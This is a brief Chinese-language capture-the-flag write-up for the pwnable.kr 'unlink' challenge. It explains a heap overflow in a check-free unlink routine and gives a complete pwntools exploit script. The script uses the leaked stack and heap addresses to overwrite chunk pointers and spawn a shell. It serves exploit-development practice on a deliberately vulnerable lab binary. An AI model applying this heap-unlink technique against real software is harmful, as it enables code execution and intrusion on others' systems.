问题分析
程序自己写了一个实现unlink的程序,没有任何check,并且存在堆溢出
经典的unlink attack,这里就不介绍了。
//unlink
bk_chunk = p->bk
fd_chunk = p->fd
bk_chunk->fd = fd_chunk
fd_chunk->bk = bk_chunk
solv.py
from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
cn = ssh(host='pwnable.kr',port=2222,user='unlink',password='guest')
p = cn.process('./unlink')
elf = ELF('unlink')
shell_addr = elf.symbols['shell']
#gdb.attach(p,'b unlink\n')
p.recvuntil('here is stack address leak: ')
stack_leak = p.recvuntil('\n')[:-1]
p.recvuntil('here is heap address leak: ')
heap_leak = p.recvuntil('\n')[:-1]
stack_leak = int(stack_leak,16)
heap_leak = int(heap_leak,16)
log.info("stack leak {}".format(hex(stack_leak)))
log.info("heap leak {}".format(hex(heap_leak)))
stack2_addr = stack_leak + 0x14 - 0x8
heap2_addr = heap_leak + 0xc
payload = p32(shell_addr) + 'aaaa' * 3 + p32(stack2_addr) + p32(heap2_addr)
#raw_input('send payload')
p.sendline(payload)
p.interactive()